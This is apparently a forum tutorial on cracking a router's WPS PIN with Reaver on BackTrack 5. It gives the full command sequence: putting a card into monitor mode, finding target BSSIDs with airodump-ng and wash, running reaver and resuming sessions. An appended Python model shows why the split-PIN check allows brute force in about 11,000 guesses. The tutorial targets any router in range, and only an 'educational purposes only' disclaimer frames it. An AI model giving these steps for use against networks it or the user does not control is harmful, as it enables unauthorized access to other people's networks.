CRACKING WPS

This tutorial was created by one of our members, bateman. THIS WILL ONLY WORK IF WPS IS ENABLED ON THE ROUTER (it is on most routers).

Boot up BackTrack 5, preferably the latest release.
If you aren't running the latest BackTrack, you'll need to install Reaver first. Connect to the internet and type the following in a terminal: apt-get install reaver
Now put your wireless card into monitor mode. On most PCs the wireless interface is called wlan0, so that's what this tutorial uses. Type the following into the terminal: airmon-ng start wlan0. This creates a separate monitor-mode interface, normally mon0, and that is the interface the remaining commands use.
Next you need the MAC address (BSSID) of the target router. Run airodump-ng on the monitor interface: airodump-ng mon0. If you only want to see access points that actually have WPS enabled (and whether WPS is currently locked), the reaver package also ships wash, which you can run as: wash -i mon0
You should now see a list of routers in range with their MAC addresses, channels and so on. Note the target's MAC address and its channel.
Next, start Reaver. Typing reaver in the terminal with no arguments prints the usage text with all the available options, so feel free to explore them.
Enter the following command, substituting the target's MAC address: reaver -i mon0 -b MACADDRESSHERE -vv. Adding -c followed by the target's channel number keeps Reaver from wasting time channel-hopping.
Now let the program do its work. Against a weak signal it can take 40+ hours, but it usually finishes in under 24 hours. If you need your PC in the meantime, press Ctrl+C: Reaver saves its progress to a session file for that BSSID and picks up where it left off when you run the same command again.
Note: this does not seem to work on BT (British Telecom) routers, even if WPS is enabled. This is for educational purposes only. UPDATE: Reaver is now included in BackTrack 5 R2.
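Why Reaver finishes in hours rather than years is worth seeing in code. The Python below is an added example, not part of bateman's tutorial or of Reaver's own source. It implements the WPS PIN checksum digit and a toy access point that, like the real WPS exchange, reveals after message M4 whether the first four PIN digits were right and after M6 whether the last three were, then recovers the PIN the way Reaver does: first half alone, then the three free digits of the second half with the checksum computed. The ModelAccessPoint class, crack_pin and estimated_hours are constructed for illustration, the 3-seconds-per-attempt rate is an assumption, and 12345670 is simply a PIN with a valid checksum.

```python
"""Added example: why a WPS PIN attack needs at most about 11,000 guesses.

The enrollee proves the PIN to the AP in two halves. The AP's reply to
message M4 reveals whether digits 1-4 were right, and its reply to M6
reveals whether digits 5-8 were right. Digit 8 is a checksum of the other
seven, so the search space is 10^4 + 10^3 = 11,000, not 10^8.
The access point below is a constructed model, not a real WPS implementation.
"""
from dataclasses import dataclass


def wps_pin_checksum(first7: int) -> int:
    """Checksum digit for a 7-digit PIN prefix.

    Weights 3,1,3,1,3,1,3 are applied from the most significant digit,
    and the checksum makes the weighted sum a multiple of ten.
    """
    if not 0 <= first7 <= 9_999_999:
        raise ValueError("PIN prefix must fit in 7 digits")
    digits = [int(d) for d in f"{first7:07d}"]
    acc = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


@dataclass
class ModelAccessPoint:
    """Toy registrar side (constructed): leaks the half-PIN check results
    the way the real protocol does, with a NACK after M4 or after M6."""
    pin: str
    m4_checks: int = 0
    m6_checks: int = 0

    def m4_response(self, first_half: str) -> bool:
        """True models an M5 reply (first four digits correct), False a NACK."""
        self.m4_checks += 1
        return first_half == self.pin[:4]

    def m6_response(self, first_half: str, second_half: str) -> bool:
        """True models an M7 reply (whole PIN correct), False a NACK.
        Only reached once the first half has been accepted."""
        self.m6_checks += 1
        return first_half + second_half == self.pin


def crack_pin(ap: ModelAccessPoint) -> tuple[str, int]:
    """Recover the PIN as Reaver does and return (pin, total_guesses).

    Phase 1 tries the 10,000 possible first halves. Phase 2 tries the
    1,000 possible free digits of the second half, filling in the checksum.
    """
    guesses = 0
    first_half = None
    for i in range(10_000):
        guesses += 1
        cand = f"{i:04d}"
        if ap.m4_response(cand):
            first_half = cand
            break
    if first_half is None:
        raise RuntimeError("model AP never accepted a first half")
    for j in range(1_000):
        guesses += 1
        prefix7 = int(first_half + f"{j:03d}")
        second_half = f"{j:03d}{wps_pin_checksum(prefix7)}"
        if ap.m6_response(first_half, second_half):
            return first_half + second_half, guesses
    raise RuntimeError("model AP never accepted a second half")


def worst_case_guesses() -> int:
    """Upper bound on guesses for the split attack: 10^4 first halves plus
    10^3 second halves, versus 10^8 for a blind eight-digit search."""
    return 10_000 + 1_000


def estimated_hours(guesses: int, seconds_per_attempt: float) -> float:
    """Wall-clock estimate for a given per-attempt cost (an assumed rate)."""
    return guesses * seconds_per_attempt / 3600


if __name__ == "__main__":
    target = ModelAccessPoint(pin="12345670")  # constructed PIN with a valid checksum
    pin, n = crack_pin(target)
    print(f"recovered {pin} after {n} guesses "
          f"(worst case {worst_case_guesses()}, vs 10^8 for a blind search)")
    # 3 s per attempt is an assumed figure, not a measurement.
    print(f"at 3 s per attempt the worst case is about "
          f"{estimated_hours(worst_case_guesses(), 3):.1f} hours")
```

The per-attempt cost in practice is dominated by the AP's response time, retransmissions on a weak link and any WPS lockout the AP applies after failed attempts, which is why the tutorial's figures range from a few hours to more than a day even though the guess count is bounded.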

Like always, this is for educational purposes only. 
